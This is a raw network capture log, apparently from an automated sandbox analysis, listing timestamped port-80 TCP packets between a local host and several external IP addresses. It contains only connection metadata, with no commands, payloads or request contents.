                                        Sep 11, 2024 10:10:10.999900103 CEST4917480192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:11.004939079 CEST804917485.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:11.012514114 CEST4917480192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:11.019891977 CEST4917480192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:11.024745941 CEST804917485.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:11.711606026 CEST804917485.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:11.711658001 CEST804917485.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:11.711785078 CEST4917480192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:11.713957071 CEST4917480192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:11.718846083 CEST804917485.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:16.748807907 CEST4917580192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:16.753725052 CEST8049175185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:16.756578922 CEST4917580192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:16.766618967 CEST4917580192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:16.771522999 CEST8049175185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:16.771661997 CEST8049175185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:16.775419950 CEST4917580192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:16.780246973 CEST8049175185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:17.453175068 CEST8049175185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:17.453644037 CEST8049175185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:17.453711033 CEST4917580192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:18.279110909 CEST4917580192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:19.297405958 CEST4917680192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:19.302568913 CEST8049176185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:19.302712917 CEST4917680192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:19.318605900 CEST4917680192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:19.323522091 CEST8049176185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:19.979223967 CEST8049176185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:19.979376078 CEST8049176185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:19.979429007 CEST4917680192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:20.822679996 CEST4917680192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:21.838649988 CEST4917780192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:21.843638897 CEST8049177185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:21.843698025 CEST4917780192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:21.862953901 CEST4917780192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:21.867924929 CEST8049177185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:21.868042946 CEST4917780192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:21.868119955 CEST8049177185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:21.872992039 CEST8049177185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:21.873102903 CEST8049177185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:22.511239052 CEST8049177185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:22.511286020 CEST8049177185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:22.511491060 CEST4917780192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:23.364795923 CEST4917780192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:24.381134987 CEST4917880192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:24.386310101 CEST8049178185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:24.387080908 CEST4917880192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:24.392992020 CEST4917880192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:24.397876024 CEST8049178185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:25.061925888 CEST8049178185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:25.061980009 CEST8049178185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:25.063039064 CEST4917880192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:25.067188025 CEST4917880192.168.2.22185.173.111.76
                                        Sep 11, 2024 10:10:25.072089911 CEST8049178185.173.111.76192.168.2.22
                                        Sep 11, 2024 10:10:30.108638048 CEST4917980192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:30.113529921 CEST8049179203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:30.113586903 CEST4917980192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:30.124953985 CEST4917980192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:30.131252050 CEST8049179203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:30.131306887 CEST4917980192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:30.131397963 CEST8049179203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:30.137190104 CEST8049179203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:30.726289034 CEST8049179203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:30.726380110 CEST8049179203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:30.726680040 CEST4917980192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:31.632874966 CEST4917980192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:32.650680065 CEST4918080192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:32.657397032 CEST8049180203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:32.662554026 CEST4918080192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:32.680532932 CEST4918080192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:32.685472965 CEST8049180203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:33.427598000 CEST8049180203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:33.427650928 CEST8049180203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:33.427709103 CEST4918080192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:34.175602913 CEST4918080192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:35.195198059 CEST4918180192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:35.200090885 CEST8049181203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:35.202718019 CEST4918180192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:35.231431007 CEST4918180192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:35.236391068 CEST8049181203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:35.236494064 CEST8049181203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:35.236588955 CEST4918180192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:35.241414070 CEST8049181203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:35.241529942 CEST8049181203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:35.875650883 CEST8049181203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:35.876039028 CEST8049181203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:35.876090050 CEST4918180192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:36.734041929 CEST4918180192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:37.750488043 CEST4918280192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:37.848809004 CEST8049182203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:37.848884106 CEST4918280192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:37.855438948 CEST4918280192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:37.860975027 CEST8049182203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:38.516591072 CEST8049182203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:38.517201900 CEST8049182203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:38.517261028 CEST4918280192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:38.519004107 CEST4918280192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:38.523937941 CEST8049182203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:43.556051016 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:43.562002897 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:43.562246084 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:43.572134972 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:43.578269005 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:43.578284025 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:43.578555107 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:43.584481001 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:44.186044931 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:44.186069012 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:44.186086893 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:44.186140060 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:44.186882019 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:45.079991102 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:46.096419096 CEST4918480192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:46.101249933 CEST8049184161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:46.103336096 CEST4918480192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:46.112723112 CEST4918480192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:46.117670059 CEST8049184161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:46.727677107 CEST8049184161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:46.727799892 CEST | 80 | 49184 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:46.727818012 CEST | 80 | 49184 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:46.727844000 CEST | 49184 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:46.727881908 CEST | 49184 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:47.624558926 CEST | 49184 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:48.639720917 CEST | 49185 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:48.644907951 CEST | 80 | 49185 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:48.644988060 CEST | 49185 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:48.656367064 CEST | 49185 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:48.661292076 CEST | 80 | 49185 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:48.661351919 CEST | 49185 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:48.661407948 CEST | 80 | 49185 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:48.666213036 CEST | 80 | 49185 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:48.666270971 CEST | 80 | 49185 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:49.275805950 CEST | 80 | 49185 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:49.275854111 CEST | 80 | 49185 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:49.275892019 CEST | 80 | 49185 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:49.275902987 CEST | 49185 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:49.275975943 CEST | 49185 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:50.167069912 CEST | 49185 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:51.182043076 CEST | 49186 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:51.187186003 CEST | 80 | 49186 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:51.187251091 CEST | 49186 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:51.193231106 CEST | 49186 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:51.198215961 CEST | 80 | 49186 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:51.790452957 CEST | 80 | 49186 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:51.790471077 CEST | 80 | 49186 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:51.790482044 CEST | 80 | 49186 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:51.790493965 CEST | 80 | 49186 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:51.790503025 CEST | 80 | 49186 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:51.790551901 CEST | 80 | 49186 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:51.794228077 CEST | 49186 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:51.794228077 CEST | 49186 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:51.794228077 CEST | 49186 | 80 | 192.168.2.22 | 161.97.168.245
                                        Sep 11, 2024 10:10:51.799448013 CEST | 80 | 49186 | 161.97.168.245 | 192.168.2.22
                                        Sep 11, 2024 10:10:56.825736046 CEST | 49187 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:10:56.830801964 CEST | 80 | 49187 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:10:56.830868959 CEST | 49187 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:10:56.840490103 CEST | 49187 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:10:57.068516970 CEST | 80 | 49187 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:10:57.068576097 CEST | 49187 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:10:57.069185972 CEST | 80 | 49187 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:10:57.073472023 CEST | 80 | 49187 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:10:57.989214897 CEST | 80 | 49187 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:10:57.989264011 CEST | 80 | 49187 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:10:57.989567041 CEST | 49187 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:10:58.343458891 CEST | 49187 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:10:59.356483936 CEST | 49188 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:10:59.361402988 CEST | 80 | 49188 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:10:59.361460924 CEST | 49188 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:10:59.370445013 CEST | 49188 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:10:59.375327110 CEST | 80 | 49188 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:00.293409109 CEST | 80 | 49188 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:00.293459892 CEST | 80 | 49188 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:00.293576956 CEST | 49188 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:00.898454905 CEST | 49188 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:01.915482998 CEST | 49189 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:01.920624971 CEST | 80 | 49189 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:01.927103996 CEST | 49189 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:01.934922934 CEST | 49189 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:01.939845085 CEST | 80 | 49189 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:01.940052032 CEST | 80 | 49189 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:01.947081089 CEST | 49189 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:01.951983929 CEST | 80 | 49189 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:01.952035904 CEST | 80 | 49189 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:02.844991922 CEST | 80 | 49189 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:02.845048904 CEST | 80 | 49189 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:02.845087051 CEST | 49189 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:03.441271067 CEST | 49189 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:04.458257914 CEST | 49190 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:04.463340998 CEST | 80 | 49190 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:04.463397026 CEST | 49190 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:04.470293999 CEST | 49190 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:04.475138903 CEST | 80 | 49190 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:05.390116930 CEST | 80 | 49190 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:05.390290976 CEST | 80 | 49190 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:05.390377045 CEST | 49190 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:05.394901037 CEST | 49190 | 80 | 192.168.2.22 | 172.96.191.39
                                        Sep 11, 2024 10:11:05.399928093 CEST | 80 | 49190 | 172.96.191.39 | 192.168.2.22
                                        Sep 11, 2024 10:11:10.474082947 CEST | 49191 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:10.479052067 CEST | 80 | 49191 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:10.479110003 CEST | 49191 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:10.494278908 CEST | 49191 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:10.499162912 CEST | 80 | 49191 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:10.499217987 CEST | 49191 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:10.499408960 CEST | 80 | 49191 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:10.504060030 CEST | 80 | 49191 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:11.106477022 CEST | 80 | 49191 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:11.106491089 CEST | 80 | 49191 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:11.106537104 CEST | 49191 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:11.106647015 CEST | 80 | 49191 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:11.106690884 CEST | 49191 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:11.211724043 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
                                        Sep 11, 2024 10:11:11.216917038 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
                                        Sep 11, 2024 10:11:11.216991901 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
                                        Sep 11, 2024 10:11:12.006031990 CEST | 49191 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:13.022891045 CEST | 49192 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:13.027858973 CEST | 80 | 49192 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:13.027925014 CEST | 49192 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:13.051879883 CEST | 49192 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:13.056948900 CEST | 80 | 49192 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:13.640247107 CEST | 80 | 49192 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:13.640358925 CEST | 80 | 49192 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:13.640706062 CEST | 49192 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:13.641521931 CEST | 80 | 49192 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:13.641746044 CEST | 49192 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:14.564335108 CEST | 49192 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:15.580981970 CEST | 49193 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:15.585946083 CEST | 80 | 49193 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:15.587224007 CEST | 49193 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:15.602130890 CEST | 49193 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:15.607053995 CEST | 80 | 49193 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:15.607381105 CEST | 80 | 49193 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:15.607566118 CEST | 49193 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:15.612384081 CEST | 80 | 49193 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:15.612457037 CEST | 80 | 49193 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:16.254100084 CEST | 80 | 49193 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:16.254115105 CEST | 80 | 49193 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:16.254127026 CEST | 80 | 49193 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:16.254137039 CEST | 80 | 49193 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:16.254189968 CEST | 49193 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:16.254189968 CEST | 49193 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:17.106960058 CEST | 49193 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:18.136482000 CEST | 49194 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:18.141510963 CEST | 80 | 49194 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:18.141765118 CEST | 49194 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:18.149590969 CEST | 49194 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:18.154479027 CEST | 80 | 49194 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:18.744267941 CEST | 80 | 49194 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:18.744292021 CEST | 80 | 49194 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:18.744513035 CEST | 49194 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:18.744714022 CEST | 80 | 49194 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:18.744818926 CEST | 80 | 49194 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:18.744877100 CEST | 49194 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:18.750468969 CEST | 49194 | 80 | 192.168.2.22 | 104.21.20.125
                                        Sep 11, 2024 10:11:18.755714893 CEST | 80 | 49194 | 104.21.20.125 | 192.168.2.22
                                        Sep 11, 2024 10:11:24.079586983 CEST | 49195 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:24.084498882 CEST | 80 | 49195 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:24.084659100 CEST | 49195 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:24.094726086 CEST | 49195 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:24.099606037 CEST | 80 | 49195 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:24.099705935 CEST | 80 | 49195 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:24.099747896 CEST | 49195 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:24.104562044 CEST | 80 | 49195 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:25.267967939 CEST | 80 | 49195 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:25.267992020 CEST | 80 | 49195 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:25.268002033 CEST | 80 | 49195 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:25.268043995 CEST | 49195 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:25.268136024 CEST | 80 | 49195 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:25.268184900 CEST | 49195 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:25.595045090 CEST | 49195 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:26.611339092 CEST | 49196 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:26.616369963 CEST | 80 | 49196 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:26.616436005 CEST | 49196 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:26.631670952 CEST | 49196 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:26.636758089 CEST | 80 | 49196 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:27.485145092 CEST | 80 | 49196 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:27.485163927 CEST | 80 | 49196 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:27.485295057 CEST | 49196 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:28.136147976 CEST | 49196 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:29.155545950 CEST | 49197 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:29.160959005 CEST | 80 | 49197 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:29.161026955 CEST | 49197 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:29.170734882 CEST | 49197 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:29.175615072 CEST | 80 | 49197 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:29.175673008 CEST | 49197 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:29.175750971 CEST | 80 | 49197 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:29.180512905 CEST | 80 | 49197 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:29.180588961 CEST | 80 | 49197 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:30.034816027 CEST | 80 | 49197 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:30.034945011 CEST | 80 | 49197 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:30.035095930 CEST | 49197 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:30.678971052 CEST | 49197 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:31.699223042 CEST | 49198 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:31.704319000 CEST | 80 | 49198 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:31.707411051 CEST | 49198 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:31.716268063 CEST | 49198 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:31.721381903 CEST | 80 | 49198 | 43.242.202.169 | 192.168.2.22
